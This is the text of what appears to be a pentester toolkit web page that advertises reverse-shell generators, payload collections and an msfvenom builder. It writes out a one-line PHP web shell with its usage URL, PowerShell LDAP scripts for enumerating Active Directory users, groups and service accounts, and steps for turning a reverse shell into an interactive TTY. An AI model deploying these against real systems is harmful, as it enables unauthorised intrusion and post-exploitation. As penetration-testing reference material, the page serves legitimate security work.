Reverse shells, payloads, exploitation references and live tooling — built for pentesters.
One-liner reverse shells across 20+ languages. Set your LHOST/LPORT and chain encodings.
loading...
Curated exploitation payloads across web attack categories. Filter, search, copy.
PHP reverse shells, web shells, and obfuscated one-liners for post-upload exploitation.
Full-featured PHP reverse shell by pentestmonkey. Edit $ip and $port before uploading.
<?php system($_GET["cmd"]);?>
Usage: http://target.com/shell.php?cmd=id
Local file inclusion payloads, PHP wrappers, and useful target files for Linux/Windows/Apache/MySQL.
XSS payloads for HTML, SVG, Markdown contexts plus data grabbers and blacklist bypasses.
UNION, error-based, blind/time-based, and auth bypass payloads for MySQL, MSSQL, Oracle, PostgreSQL.
Post-exploitation Linux enumeration, SUID, cron, network, privesc, and file transfer commands.
PowerShell enumeration, Active Directory recon via PowerView, and AD LDAP scripts.
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://" + $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter = "samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result) {
Foreach($prop in $obj.Properties) { $prop }
Write-Host "------------------------"
}$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://" + $PDC + "/" + "DC=$($domainObj.Name.Replace('.', ',DC='))"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$Searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.filter = "(objectClass=Group)"
$Searcher.FindAll() | Foreach { $_.Properties.name }$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://" + $PDC + "/" + "DC=$($domainObj.Name.Replace('.', ',DC='))"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$Searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.filter = "serviceprincipalname=*http*"
$Searcher.FindAll() | Foreach {
Foreach($prop in $_.Properties) { $prop }
}Encode, decode, hash, and crack. Powered by client-side JS and the Hashes.com API for lookups.
Build msfvenom payload commands and handler one-liners. All options configurable.
Stabilize a dumb shell into a fully interactive TTY with arrow keys, tab-complete, and Ctrl+C.
python3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xterm
Ctrl + Z
stty raw -echo; fg
stty size, then set it on the target.stty rows 38 columns 116